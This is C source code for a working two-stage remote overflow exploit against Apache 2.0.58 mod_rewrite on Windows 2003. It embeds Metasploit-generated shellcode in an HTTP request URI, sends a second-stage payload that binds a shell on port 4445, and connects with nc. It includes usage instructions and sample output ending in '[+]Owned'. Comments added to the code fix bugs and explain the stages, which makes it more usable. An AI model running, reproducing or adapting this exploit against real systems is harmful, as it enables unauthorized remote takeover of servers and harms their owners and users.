Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)

/*
apache mod rewrite exploit (win32)

By: fabio/b0x (oc-192, old CoTS member)

Vuln details: http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded

Code: bind shell on port 4445, tested on apache 2.0.58 with mod_rewrite (windows 2003)
The original exploit (http://milw0rm.com/exploits/3680) only had a call-back to 192.168.0.1 and was also
a little buggy, so the shellcode was rewritten (generated with http://metasploit.com/).

Usage: ./apache hostname rewrite_path

Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard

Example: ./apache 192.168.0.253 test
[+]Preparing payload
[+]Connecting...
[+]Connected
[+]Sending...
[+]Sent
[+]Starting second stage...
[+]Connecting...
[+]Connected
[+]Sending...
[+]Sent
[+]Connecting to shell
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Program Files\Apache Group\Apache2>exit
exit
[+]Owned
*/
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netdb.h>
#include <netinet/in.h>
#include <unistd.h>

/*
 * Ports used by the two delivery stages and the final shell connection:
 *   PORT  - the target web server, where the GET request goes (stage one);
 *   PORT2 - where the second-stage payload is pushed (stage two).
 * The interactive shell itself is reached on 4445 by main().
 * MAXDATASIZE is kept because main() still sizes a buffer with it; nothing
 * in this file reads from a socket.
 */
enum {
    PORT = 80,
    PORT2 = 4444,
    MAXDATASIZE = 1024
};

/*
 * Request suffix placed right after the rewrite path in the URI. The
 * ldap:// URL with %3f-encoded '?' separators is presumably what steers the
 * request into mod_rewrite's LDAP escaping code covered by the advisory
 * linked in the header; the trailing %90 decodes to 0x90 (x86 NOP).
 */
char get[] = "/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90";
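/*
 * Stage-one payload, carried inside the request URI of the GET request.
 * The header comment says it was regenerated with Metasploit. The first ten
 * bytes are raw (0xeb/0xe8 jumps, 0xff) - presumably a get-PC stub for the
 * decoder - and every byte after them is a plain ASCII alphanumeric, which is
 * what lets it travel in a URL without percent-encoding. It contains no NUL
 * byte, so strlen() yields its full length of 636 bytes.
 *
 * The escapes were restored from "/xNN" (a copy/paste artifact of the page
 * this was taken from, which turned every backslash into a slash) back to
 * "\xNN"; as published the strings would have been sent as literal text.
 * The byte values themselves are untouched.
 */
char shellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x50\x30\x42\x30\x41\x6b\x41\x41\x51\x41\x32\x41\x41\x32\x42"
"\x42\x42\x30\x42\x41\x58\x38\x41\x42\x50\x75\x7a\x49\x4b\x58\x56"
"\x36\x73\x30\x43\x30\x75\x50\x70\x53\x66\x35\x70\x56\x31\x47\x4c"
"\x4b\x50\x6c\x44\x64\x55\x48\x6c\x4b\x73\x75\x75\x6c\x4c\x4b\x61"
"\x44\x73\x35\x63\x48\x35\x51\x4b\x5a\x6c\x4b\x50\x4a\x37\x68\x6c"
"\x4b\x42\x7a\x77\x50\x37\x71\x4a\x4b\x6b\x53\x44\x72\x30\x49\x6e"
"\x6b\x44\x74\x6e\x6b\x56\x61\x68\x6e\x54\x71\x39\x6f\x6b\x4c\x70"
"\x31\x4b\x70\x6c\x6c\x67\x48\x6b\x50\x54\x34\x53\x37\x6b\x71\x68"
"\x4f\x44\x4d\x73\x31\x78\x47\x38\x6b\x38\x72\x45\x6b\x73\x4c\x31"
"\x34\x46\x74\x52\x55\x6b\x51\x6c\x4b\x63\x6a\x65\x74\x56\x61\x7a"
"\x4b\x32\x46\x4c\x4b\x76\x6c\x70\x4b\x4e\x6b\x30\x5a\x75\x4c\x67"
"\x71\x5a\x4b\x6e\x6b\x74\x44\x4e\x6b\x57\x71\x6b\x58\x68\x6b\x76"
"\x62\x50\x31\x4b\x70\x33\x6f\x53\x6e\x31\x4d\x63\x6b\x4b\x72\x65"
"\x58\x55\x50\x61\x4e\x31\x7a\x36\x50\x42\x79\x70\x64\x4e\x6b\x74"
"\x59\x6e\x6b\x43\x6b\x44\x4c\x4c\x4b\x51\x4b\x77\x6c\x4c\x4b\x35"
"\x4b\x6e\x6b\x31\x4b\x74\x48\x73\x63\x63\x58\x6c\x4e\x70\x4e\x44"
"\x4e\x78\x6c\x79\x6f\x4b\x66\x4d\x59\x6f\x37\x4b\x31\x78\x6c\x33"
"\x30\x77\x71\x73\x30\x47\x70\x36\x37\x53\x66\x51\x43\x4d\x59\x69"
"\x75\x39\x78\x56\x47\x57\x70\x37\x70\x37\x70\x6e\x70\x45\x51\x33"
"\x30\x37\x70\x4c\x76\x72\x39\x55\x48\x7a\x47\x6d\x74\x45\x49\x54"
"\x30\x4d\x39\x38\x65\x77\x39\x4b\x36\x50\x49\x6c\x64\x35\x4a\x52"
"\x50\x4f\x37\x6c\x64\x4c\x6d\x76\x4e\x4d\x39\x4b\x69\x45\x59\x49"
"\x65\x4e\x4d\x78\x4b\x4a\x4d\x6b\x4c\x77\x4b\x31\x47\x50\x53\x74"
"\x72\x61\x4f\x46\x53\x67\x42\x57\x70\x61\x4b\x6c\x4d\x42\x6b\x75"
"\x70\x70\x51\x6b\x4f\x7a\x77\x4b\x39\x4b\x6f\x4f\x79\x4f\x33\x4e"
"\x6d\x71\x65\x52\x34\x53\x5a\x53\x37\x30\x59\x50\x51\x66\x33\x4b"
"\x4f\x55\x64\x4c\x4f\x6b\x4f\x66\x35\x43\x34\x50\x59\x6e\x69\x47"
"\x74\x6c\x4e\x6a\x42\x58\x72\x54\x6b\x64\x67\x72\x74\x39\x6f\x76"
"\x57\x6b\x4f\x50\x55\x44\x70\x30\x31\x4b\x70\x50\x50\x30\x50\x50"
"\x50\x32\x70\x77\x30\x46\x30\x53\x70\x70\x50\x49\x6f\x63\x65\x66"
"\x4c\x4b\x39\x4f\x37\x30\x31\x6b\x6b\x33\x63\x71\x43\x42\x48\x54"
"\x42\x63\x30\x76\x71\x63\x6c\x4c\x49\x6d\x30\x52\x4a\x32\x30\x32"
"\x70\x36\x37\x59\x6f\x52\x75\x71\x34\x50\x53\x70\x57\x4b\x4f\x72"
"\x75\x44\x68\x61\x43\x62\x74\x33\x67\x59\x6f\x63\x65\x67\x50\x4c"
"\x49\x38\x47\x6d\x51\x5a\x4c\x53\x30\x36\x70\x53\x30\x33\x30\x4e"
"\x69\x4b\x53\x53\x5a\x43\x30\x72\x48\x53\x30\x34\x50\x33\x30\x33"
"\x30\x50\x53\x76\x37\x6b\x4f\x36\x35\x74\x58\x6e\x61\x4a\x4c\x67"
"\x70\x35\x54\x33\x30\x63\x30\x49\x6f\x78\x53\x41";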


char finish[]= "HTTP/1.0/r/nHost: ";

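/*
 * Stage-two payload, sent raw to PORT2 after the first stage has had a few
 * seconds to run. Unlike shellcode[] it is not restricted to alphanumerics.
 * The opening bytes (xor ecx,ecx / fnstenv / xor dword [ebx+0x13]) look like
 * the Metasploit fnstenv-sub XOR decoder with a 4-byte key at offset 16, but
 * that has not been verified here. No NUL byte is present, so strlen()
 * yields its full length of 344 bytes.
 *
 * Escapes restored from "/xNN" (copy/paste artifact) to "\xNN"; the byte
 * values themselves are untouched.
 */
char payload2[] =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x18"
"\xd9\x03\x3a\x83\xeb\xfc\xe2\xf4\xe4\xb3\xe8\x77\xf0\x20\xfc\xc5"
"\xe7\xb9\x88\x56\x3c\xfd\x88\x7f\x24\x52\x7f\x3f\x60\xd8\xec\xb1"
"\x57\xc1\x88\x65\x38\xd8\xe8\x73\x93\xed\x88\x3b\xf6\xe8\xc3\xa3"
"\xb4\x5d\xc3\x4e\x1f\x18\xc9\x37\x19\x1b\xe8\xce\x23\x8d\x27\x12"
"\x6d\x3c\x88\x65\x3c\xd8\xe8\x5c\x93\xd5\x48\xb1\x47\xc5\x02\xd1"
"\x1b\xf5\x88\xb3\x74\xfd\x1f\x5b\xdb\xe8\xd8\x5e\x93\x9a\x33\xb1"
"\x58\xd5\x88\x4a\x04\x74\x88\x7a\x10\x87\x6b\xb4\x56\xd7\xef\x6a"
"\xe7\x0f\x65\x69\x7e\xb1\x30\x08\x70\xae\x70\x08\x47\x8d\xfc\xea"
"\x70\x12\xee\xc6\x23\x89\xfc\xec\x47\x50\xe6\x5c\x99\x34\x0b\x38"
"\x4d\xb3\x01\xc5\xc8\xb1\xda\x33\xed\x74\x54\xc5\xce\x8a\x50\x69"
"\x4b\x8a\x40\x69\x5b\x8a\xfc\xea\x7e\xb1\x12\x67\x7e\x8a\x8a\xdb"
"\x8d\xb1\xa7\x20\x68\x1e\x54\xc5\xce\xb3\x13\x6b\x4d\x26\xd3\x52"
"\xbc\x74\x2d\xd3\x4f\x26\xd5\x69\x4d\x26\xd3\x52\xfd\x90\x85\x73"
"\x4f\x26\xd5\x6a\x4c\x8d\x56\xc5\xc8\x4a\x6b\xdd\x61\x1f\x7a\x6d"
"\xe7\x0f\x56\xc5\xc8\xbf\x69\x5e\x7e\xb1\x60\x57\x91\x3c\x69\x6a"
"\x41\xf0\xcf\xb3\xff\xb3\x47\xb3\xfa\xe8\xc3\xc9\xb2\x27\x41\x17"
"\xe6\x9b\x2f\xa9\x95\xa3\x3b\x91\xb3\x72\x6b\x48\xe6\x6a\x15\xc5"
"\x6d\x9d\xfc\xec\x43\x8e\x51\x6b\x49\x88\x69\x3b\x49\x88\x56\x6b"
"\xe7\x09\x6b\x97\xc1\xdc\xcd\x69\xe7\x0f\x69\xc5\xe7\xee\xfc\xea"
"\x93\x8e\xff\xb9\xdc\xbd\xfc\xec\x4a\x26\xd3\x52\xe8\x53\x07\x65"
"\x4b\x26\xd5\xc5\xc8\xd9\x03\x3a";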

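/*
 * Send every byte of data over fd, retrying on short writes and EINTR.
 * Returns 0 once all len bytes were accepted by the kernel, -1 on any other
 * send() error (errno is left as send() set it).
 */
static int send_all(int fd, const char *data, size_t len)
{
    while (len > 0) {
        ssize_t n = send(fd, data, len, 0);
        if (n == -1) {
            if (errno == EINTR) {
                continue;
            }
            return -1;
        }
        data += n;
        len -= (size_t)n;
    }
    return 0;
}

/*
 * Resolve host, open a TCP connection to port and push len bytes of data
 * through it, printing the same progress lines the original code printed.
 * Returns 0 on success, -1 after printing the matching "[-]..." line.
 * IPv4 only (gethostbyname + sockaddr_in), as before.
 */
static int send_stage(const char *host, unsigned short port,
                      const char *data, size_t len)
{
    printf("[+]Connecting...\n");

    struct sockaddr_in addr;
    struct hostent *he = gethostbyname(host);
    if (he == NULL || he->h_addrtype != AF_INET || he->h_addr_list[0] == NULL
        || (size_t)he->h_length != sizeof addr.sin_addr) {
        printf("[-]Cannot resolv hostname...\n");
        return -1;
    }

    int fd = socket(PF_INET, SOCK_STREAM, 0);
    if (fd == -1) {
        printf("[-]Socket error...\n");
        return -1;
    }

    memset(&addr, 0, sizeof addr);
    addr.sin_family = AF_INET;
    addr.sin_port = htons(port);
    memcpy(&addr.sin_addr, he->h_addr_list[0], sizeof addr.sin_addr);

    if (connect(fd, (struct sockaddr *)&addr, sizeof addr) == -1) {
        printf("[-]Unable to connect\n");
        close(fd);
        return -1;
    }

    printf("[+]Connected\n[+]Sending...\n");
    if (send_all(fd, data, len) == -1) {
        printf("[-]Unable to send\n");
        close(fd);
        return -1;
    }
    printf("[+]Sent\n");
    close(fd);
    return 0;
}

/*
 * Build the stage-one HTTP request:
 *   "GET /" + rewrite_path + get + shellcode + finish + host + "\r\n\r\n"
 * byte-for-byte as the original sprintf() format produced it (including the
 * absence of a space between the shellcode and "HTTP/1.0"; the wire format
 * is left alone so the exploit behaves as published). The original wrote
 * this into a fixed 748-byte stack buffer, which with the 636-byte shellcode
 * leaves only a few dozen bytes for host + path and overflowed the tool's
 * own stack on longer arguments; here the buffer is sized from the formatted
 * length. Returns a malloc()ed string the caller frees, or NULL on failure.
 */
static char *build_request(const char *host, const char *path)
{
    static const char fmt[] = "GET /%s%s%s%s%s\r\n\r\n";
    int n = snprintf(NULL, 0, fmt, path, get, shellcode, finish, host);
    if (n < 0) {
        return NULL;
    }
    size_t size = (size_t)n + 1;
    char *req = malloc(size);
    if (req == NULL) {
        return NULL;
    }
    if (snprintf(req, size, fmt, path, get, shellcode, finish, host) != n) {
        free(req);
        return NULL;
    }
    return req;
}

/*
 * Run "nc -w 10 <host> 4445" and report whether it exited with status 0,
 * the same success criterion the original system() call used. The hostname
 * is handed to nc as one argv element instead of being spliced into a shell
 * command line, so shell metacharacters in it are passed through verbatim
 * and there is no fixed 1024-byte command buffer to overflow. nc is still
 * looked up on PATH. Returns 0 on success, -1 otherwise.
 */
static int run_shell_client(const char *host)
{
    char *const nc_argv[] = { "nc", "-w", "10", (char *)host, "4445", NULL };
    pid_t pid = fork();
    if (pid < 0) {
        return -1;
    }
    if (pid == 0) {
        execvp(nc_argv[0], nc_argv);
        _exit(127); /* exec failed; mirror the shell's "command not found" */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) {
        return -1;
    }
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -1;
}

/*
 * Entry point: ./apache hostname rewrite_path
 *
 * Stage one sends the GET request (shellcode embedded in the URI) to PORT.
 * Stage two connects to PORT2 and pushes payload2; presumably the stage-one
 * code listens there and the second stage is what binds the shell on 4445
 * (the header comment says "bind shell on port 4445"; not verified here).
 * Finally nc is run against 4445 and its exit status decides the verdict.
 *
 * Every progress/error line is printed exactly as before. Differences from
 * the original: the request buffer is sized dynamically (see build_request),
 * short sends are completed, nc is exec'ed with an explicit argv, and the
 * exit status is 0 only on "[+]Owned" (the original always exit(1)ed, so a
 * caller could not tell success from failure).
 */
int main(int argc, char *argv[])
{
    printf(" Exploit: apache mod rewrite exploit (win32)\n"
           " By: fabio/b0x (oc-192, old CoTS member)\n"
           "Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard\n");
    if (argc != 3) {
        printf(" Usage: ./apache hostname rewrite_path\n");
        return 1;
    }
    const char *host = argv[1];
    const char *path = argv[2];

    printf("\n[+]Preparing payload\n");
    char *request = build_request(host, path);
    if (request == NULL) {
        printf("[-]Cannot build request\n");
        return 1;
    }
    /* shellcode[] has no NUL byte, so strlen() covers the whole request. */
    int rc = send_stage(host, PORT, request, strlen(request));
    free(request);
    if (rc == -1) {
        return 1;
    }

    printf("[+]Starting second stage...\n");
    sleep(3); /* as in the original; presumably lets stage one start listening */
    if (send_stage(host, PORT2, payload2, strlen(payload2)) == -1) {
        return 1;
    }

    printf("[+]Connecting to shell\n");
    sleep(3);
    if (run_shell_client(host) == 0) {
        printf("[+]Owned\n");
        return 0;
    }
    printf("[-]Not hacked\n");
    return 1;
}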